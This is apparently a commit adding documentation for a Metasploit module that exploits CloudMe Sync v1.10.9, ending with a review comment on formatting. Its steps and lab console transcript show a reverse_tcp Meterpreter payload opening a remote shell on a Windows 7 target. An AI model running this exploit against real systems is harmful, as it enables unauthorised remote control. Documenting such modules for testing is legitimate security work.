
CloudMe Sync Client documentation

Daniel Teixeira 2 years ago
commit
ff3b318abd
1 changed files with 66 additions and 0 deletions
documentation/modules/exploit/windows/misc/cloudme_sync.md

@@ -0,0 +1,66 @@
1
+
2
+## Verification Steps
3
+    1. Install CloudMe for Desktop version `v1.10.9`
4
+  2. Create a free account and start the applicaton
5
+  6. Start `msfconsole`
6
+    4. Do `use exploit/windows/misc/cloudme_sync`
7
+    5. Do `set RHOST ip`
8
+  11. Do `set PAYLOAD windows/meterpreter/reverse_tcp`
9
+  12. Do `set LHOST ip`
10
+  13. Do `exploit`
11
+  14. Verify the Meterpreter session is opened
12
+
13
+## Scenarios
14
+
15
+### CloudMe Sync client application on Windows 7 SP1
16
+
17
+```
18
+msf > use exploit/windows/misc/cloudme_sync 
19
+msf exploit(windows/misc/cloudme_sync) > show options 
20
+
21
+Module options (exploit/windows/misc/cloudme_sync):
22
+
23
+   Name   Current Setting  Required  Description
24
+   ----   ---------------  --------  -----------
25
+   RHOST  172.16.40.148    yes       The target address
26
+   RPORT  8888             yes       The target port (TCP)
27
+
28
+
29
+Payload options (windows/meterpreter/reverse_tcp):
30
+
31
+   Name      Current Setting  Required  Description
32
+   ----      ---------------  --------  -----------
33
+   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
34
+   LHOST     172.16.40.5      yes       The listen address
35
+   LPORT     4444             yes       The listen port
36
+
37
+
38
+Exploit target:
39
+
40
+   Id  Name
41
+   --  ----
42
+   0   CloudMe Sync v1.10.9
43
+
44
+
45
+msf exploit(windows/misc/cloudme_sync) > set RHOST 172.16.40.148
46
+RHOST => 172.16.40.148
47
+msf exploit(windows/misc/cloudme_sync) > set PAYLOAD windows/meterpreter/reverse_tcp
48
+PAYLOAD => windows/meterpreter/reverse_tcp
49
+msf exploit(windows/misc/cloudme_sync) > set LHOST 172.16.40.5 
50
+LHOST => 172.16.40.5
51
+msf exploit(windows/misc/cloudme_sync) > exploit 
52
+
53
+[*] Started reverse TCP handler on 172.16.40.5:4444 
54
+[*] Sending stage (179779 bytes) to 172.16.40.148
55
+[*] Meterpreter session 1 opened (172.16.40.5:4444 -> 172.16.40.148:57185) at 2018-02-19 12:35:21 +0000
56
+
57
+meterpreter > sysinfo 
58
+Computer        : PC
59
+OS              : Windows 7 (Build 7601, Service Pack 1).
60
+Architecture    : x86
61
+System Language : pt_PT
62
+Domain          : WORKGROUP
63
+Logged On Users : 1
64
+Meterpreter     : x86/windows
65
+meterpreter >
66
+```
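
Review bot: The numbered list under `## Verification Steps` is misnumbered (1, 2, 6, 4, 5, 11, 12, 13, 14) and mixes two-space and four-space indentation, so the steps read out of order in the raw file and the four-space items can be parsed as an indented code block by some Markdown renderers. Renumber the steps 1 to 9 and start each at the left margin. In step 2, "applicaton" should be "application". The file also opens directly with the verification steps: a short section ahead of them that describes the vulnerable application and says where the `v1.10.9` installer can be obtained would let a tester reproduce the setup without guessing. In the scenario transcript, `show options` already lists `RHOST 172.16.40.148` before the `set RHOST` command is run, so either capture the options output after the `set` commands or drop the redundant one.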
